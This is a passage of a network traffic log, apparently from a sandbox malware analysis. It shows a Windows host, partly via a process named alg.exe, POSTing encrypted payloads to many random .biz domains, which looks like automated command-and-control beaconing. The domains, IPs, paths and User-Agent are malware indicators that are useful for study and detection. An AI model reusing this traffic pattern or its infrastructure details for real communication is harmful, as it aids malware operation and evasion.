                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:16.167325974 CET | 778 | OUT | Data Raw: ba 4b 3e a3 2c 18 b1 fb fe 02 00 00 77 54 86 41 7d d1 df 50 14 6a 22 4c 0e a2 27 72 48 03 ef 71 64 ae 52 7b bd 17 46 c7 e3 b6 bc 00 39 a9 7b f0 61 e4 86 97 2b f1 61 94 be 03 52 d4 fd 41 4f ec f9 41 ae 64 3e 2a f6 2f 21 78 6f 6f cd 4c a7 7c 83 40
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: K>,wTA}Pj"L'rHqdR{F9{a+aRAOAd>*/!xooL|@ACD<R<RU71UniB-ppbb/{stKvQ1+3Oa=New%1.9f'3<$jc5xSJsH.IO.'/]m@i
Nov 18, 2024 09:58:17.123334885 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=1c7d5518e27f8bf4e71a2ab5bb7af2e9|155.94.241.187|1731920296|1731920296|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
79 | 192.168.2.7 | 50058 | 13.251.16.150 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:16.406208038 CET | 358 | OUT | POST /nvkbktvsplwlkgem HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: qaynky.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:16.406408072 CET | 842 | OUT | Data Raw: 8f ef 79 d0 1a c0 f0 e6 3e 03 00 00 0c 30 b2 4e 74 19 6d d5 f0 19 ff a3 f4 c9 99 a2 93 23 18 84 36 70 4e af d3 1b 8f 93 88 20 a3 73 79 88 39 62 63 b1 b7 3d 53 71 51 46 5e 29 19 a0 8a 9a 29 46 6e e6 40 1d f4 12 9d 05 8f 61 a8 08 27 9d e3 99 02 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: y>0Ntm#6pN sy9bc=SqQF^))Fn@a'.6~I=G{'S2YoUDYAz1OX2N@W/NucsVNK:GcnR}".k"8c92bCA2~UB&
Nov 18, 2024 09:58:17.837049961 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=59b32dff58ea39eb815cb0cbab9e274c|155.94.241.187|1731920297|1731920297|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.7 | 50059 | 85.214.228.140 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:17.374934912 CET | 345 | OUT | POST /e HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:17.374960899 CET | 778 | OUT | Data Raw: 5e cf 41 48 0c 62 e9 6e fe 02 00 00 66 d7 cd a9 1a a6 82 43 06 84 43 4b 0e 2f 9a 26 55 c5 39 b2 7c 2a 63 2c 47 b6 e9 ad 33 12 51 99 a8 44 6a e9 d8 32 a6 07 f2 be ac c9 22 10 c4 57 3c 4c 67 dd ef f2 94 e0 b0 86 72 36 6e c3 be 02 30 7f 78 a6 57 f4
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: ^AHbnfCCK/&U9|*c,G3QDj2"W<Lgr6n0xW.s;wQ"Uz0nh~m%-:;JMjG3NrRaNrygr,$r=E2B/}2&XB$PPgrpfY$[A6-:
Nov 18, 2024 09:58:18.254091024 CET | 176 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 19
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 404 page not found
Nov 18, 2024 09:58:18.441463947 CET | 359 | OUT | POST /sywxrbcrkxovprj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:18.441517115 CET | 778 | OUT | Data Raw: 1e ad 2a 64 14 99 3f dc fe 02 00 00 c4 2f 56 d8 37 3b e0 3a 03 16 41 95 f4 f5 36 e7 ba 2b 19 fa 0d 6d 3f da 46 e9 73 6d 67 e4 2c 27 59 0f cd ac e5 0d aa f6 78 22 97 23 e8 46 ca d6 cd 8e 67 40 b8 89 60 6d b6 62 0d 4d fa c6 89 3a 8f 17 3c a3 bf 8b
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: *d?/V7;:A6+m?Fsmg,'Yx"#Fg@`mbM:<}e:(HJ51M/|1+gM/4k!$;VS%k:Nx]1M3gG!JRij<NE6oPN4^f]B[n?AOpG
Nov 18, 2024 09:58:18.705045938 CET | 176 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 19
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 404 page not found


Session ID | Source IP | Source Port | Destination IP | Destination Port
81 | 192.168.2.7 | 50060 | 44.221.84.105 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:17.854978085 CET | 353 | OUT | POST /smwfchek HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:17.854994059 CET | 842 | OUT | Data Raw: e7 bf df f5 00 ee 28 d9 3e 03 00 00 b5 f6 e0 1a 34 de 88 d9 f6 6f 9f 68 32 44 6c 75 c0 0b 80 5f ac 50 21 04 76 f2 c3 a2 3c 7e 27 17 c0 4b ff 2f c4 50 be 9a 84 b3 a0 f8 dc d6 32 1e 70 e3 a9 7c 94 a5 bc 3e 27 73 f4 b6 5b d4 14 a8 1e c1 b4 33 91 db
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: (>4oh2Dlu_P!v<~'K/P2p|>'s[3&7zP:BzOZCX')%!`A@4J8U*ff8P<::y#AbJiW;:Mt<CLF<b1dAGX0
Nov 18, 2024 09:58:18.528311968 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=25376dbff96d5be6ec5441b8e835f3c8|155.94.241.187|1731920298|1731920298|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
82 | 192.168.2.7 | 50061 | 54.244.188.177 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:18.553879976 CET | 360 | OUT | POST /pgswneolngwqmbma HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dwrqljrr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 842
Nov 18, 2024 09:58:18.553910971 CET | 842 | OUT | Data Raw: df e1 90 12 c9 19 3d 47 3e 03 00 00 eb 00 8e 4a ac ba 8d 66 9c c2 c9 fb 4c 8e 2b 9c 56 2a 8e 78 a6 68 71 64 f7 e2 3b d0 f3 39 78 23 6b 43 45 0f 70 79 10 c6 d4 b2 92 1f 78 45 f6 06 a9 1d cb 5d 3f 95 7b be d1 a1 52 f0 ff bf 54 08 bd 2a 6c fb 9b 4b
Data Ascii: =G>JfL+V*xhqd;9x#kCEpyxE]?{RT*lK*ia`X\7|lah<Hl}X% BuDqKl}EIYXU~c5F&?4<16W.lj3oPa%K^[;zgKk~%zlEa
Nov 18, 2024 09:58:19.402029991 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5656ed73557aa3732ed2832c99cfc212|155.94.241.187|1731920299|1731920299|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
83 | 192.168.2.7 | 50062 | 47.129.31.212 | 80 | 5368 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:18.951535940 CET | 344 | OUT | POST /b HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: oflybfv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:18.951535940 CET | 778 | OUT | Data Raw: 12 7b 12 cc 50 1d 5a aa fe 02 00 00 ba ff 8f 8b f6 47 ae 6b 85 71 bd 46 d1 83 58 dd 85 11 eb ce 6d b7 7d 29 e0 2c af 96 fe 7b 81 40 26 a2 f2 c6 54 9c ab 5a d7 af 19 f3 94 8c 1e f6 5b 0b e0 e5 92 5d f8 8b e6 2e 3f c5 c8 53 b3 80 c6 73 40 f8 a2 3b
Data Ascii: {PZGkqFXm}),{@&TZ[].?Ss@;OM^o9,myFvHnz4Jwce`7cW]-O`zYH+u4|-&UZ+R`<5uuQ,YYUwVHxYFo1v
Nov 18, 2024 09:58:20.420805931 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=afa599aaab5b372146bb720bf2297749|155.94.241.187|1731920300|1731920300|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
84 | 192.168.2.7 | 50063 | 35.164.78.200 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:19.422815084 CET | 347 | OUT | POST /ufwhu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: nqwjmb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 842
Nov 18, 2024 09:58:19.422975063 CET | 842 | OUT | Data Raw: 08 98 be ba ae 89 80 f1 3e 03 00 00 6b 1d 0d 44 1d b3 fb 2c 7f d2 f7 d3 8f 85 2e 34 fa 28 c9 6b 2a b7 24 d7 f3 ac 54 52 ef c5 8b e7 a1 26 37 4c bb 15 92 dd fe b6 df 25 5a 92 3e 0e 67 b6 a8 24 54 9e 38 80 85 7f 95 a2 a0 1a 1f 53 07 f5 d3 16 b6 0c
Data Ascii: >kD,.4(k*$TR&7L%Z>g$T8SKepWWxo3+bu5p]DzP^o-F6"lhGk#DRV/zBvK`A!LvgQ)(jlb*?QVyFnhZN`}R+8?52t!KLlW
Nov 18, 2024 09:58:20.267492056 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9a7375c20d650b5e9520046e3a938b2b|155.94.241.187|1731920300|1731920300|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      85192.168.2.75006434.211.97.45805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.744335890 CET351OUTPOST /dinrksxkdm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:20.744358063 CET | 778 | OUT | Data Raw: 4a a8 8b d9 3a a5 6d eb fe 02 00 00 b8 c7 00 af d2 b2 13 e8 e3 7c f1 de ae 7d 48 ac e6 59 be 65 d6 8e f4 39 9b 38 0e 9e 72 bf 72 e7 92 e8 c0 c2 49 5a 4e 27 74 9b 9d ea ee 43 a7 e8 8e 00 54 9d 75 b5 fe 4e 47 d6 c5 95 17 58 16 01 fe f2 c2 fd d5 ec
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: J:m|}HYe98rrIZN'tCTuNGXcV%Dx.ww4$`6ys(BD*Q:N-H]r'6{B!9kEwaKu#A/c@
Nov 18, 2024 09:58:21.570540905 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:21 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=3edf6646c9e1743f67cd690dfc4f8d37|155.94.241.187|1731920301|1731920301|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
86 | 192.168.2.7 | 50065 | 3.94.10.34 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:21.975764990 CET | 351 | OUT | POST /pntkcm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:21.975799084 CET | 842 | OUT | Data Raw: 85 d7 4b e6 a3 6e f5 d8 3e 03 00 00 65 2b 92 15 27 b7 aa 8f 5a a2 5a dd 4b 6c 17 17 44 84 4c 9f 48 85 68 6b fd d8 13 b4 ff 75 c8 b4 d6 b3 9d bd 17 e7 bb 35 1f dd 86 93 b9 33 82 1e 03 eb bb e7 f5 d1 52 52 0f b7 b5 71 28 18 38 48 ac 37 fb 8b e4 21
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: Kn>e+'ZZKlDLHhku53RRq(8H7!e>qJPxE{a/"!oMb[`ZUQIXQ<J:Nxfubj!8H>aGGxv.IWJ;~c2%)M)fDI
Nov 18, 2024 09:58:22.636013985 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:22 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=95745d89293df0589e20683c255ae1ac|155.94.241.187|1731920302|1731920302|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
87 | 192.168.2.7 | 50066 | 47.129.31.212 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:22.034554005 CET | 346 | OUT | POST /ovpu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:22.034605026 CET | 778 | OUT | Data Raw: 1e de 47 3f 33 72 57 f2 fe 02 00 00 c4 7a d5 34 2b b0 a4 e7 0c 5a 5c 80 11 ae e2 9e 95 0f f7 69 2c c6 b6 ed 8c a8 ab ed 95 4d cf 73 57 43 3f 98 72 30 ed 44 25 2b c5 24 f3 ff dd fd a9 8c 1f 48 4f 48 1f 09 b3 5b 6e ca 71 7b e7 a0 43 c3 f0 5c 76 2a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: G?3rWz4+Z\i,MsWC?r0D%+$HOH[nq{C\v*LazK1)>UI[f::j?_Xc'n\feRQeF2f^65]H DHH0}'"Po.z~M}Rf
Nov 18, 2024 09:58:23.513679981 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=41062c10834d954eb0b5ba95c3cbfe93|155.94.241.187|1731920303|1731920303|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
88 | 192.168.2.7 | 50067 | 165.160.13.20 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:22.657634020 CET | 351 | OUT | POST /cqtkpvwafc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:22.657668114 CET  842  OUT  Data Raw: 49 32 78 0f c4 2e 83 3a 3e 03 00 00 e2 f1 f4 d7 68 5b 56 18 b9 35 62 ad 01 b1 4a 8e b8 74 0d c2 ef 01 d2 80 67 21 f0 11 5b 9e 80 63 0b 16 db d2 6c 50 35 7e a0 f9 82 72 ac 4a 63 bf fb ad 33 44 0d 5d c8 04 fe b5 e0 50 eb 7c 0d 06 b0 40 ed 10 06 cb
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: I2x.:>h[V5bJtg![clP5~rJc3D]P|@@LzC}qVa%w"+;H89h :%$9^Apzt4z/s)y7X*#;@g'Z"KETG<_(|jQ#
Nov 18, 2024 09:58:23.343055964 CET  170  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
Nov 18, 2024 09:58:23.350097895 CET  342  OUT  POST /n HTTP/1.1
